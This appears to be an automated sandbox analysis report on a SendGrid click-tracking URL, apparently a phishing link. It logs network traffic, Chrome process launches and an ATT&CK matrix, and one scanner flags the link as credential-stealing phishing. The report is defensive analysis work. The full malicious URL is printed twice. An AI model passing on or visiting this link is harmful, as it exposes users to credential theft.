Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.troj.win@19/132@54/18
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,2262898026489481170,16591654043166447335,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,2262898026489481170,16591654043166447335,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D0%Avira URL Cloudsafe
https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.agriparadigma.it/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.40%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg0%Avira URL Cloudsafe
https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed0%Avira URL Cloudsafe
https://www.tentamus.com0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-includes/css/classic-themes.min.css?ver=10%Avira URL Cloudsafe
https://www.agriparadigma.it/t-magazine/0%Avira URL Cloudsafe
https://www.tentamus.com/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.20%Avira URL Cloudsafe
https://www.agriparadigma.it/#/schema/BreadcrumbList0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=17327899771470%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus/assets/images/tentamus-marker-dark.svg0%Avira URL Cloudsafe
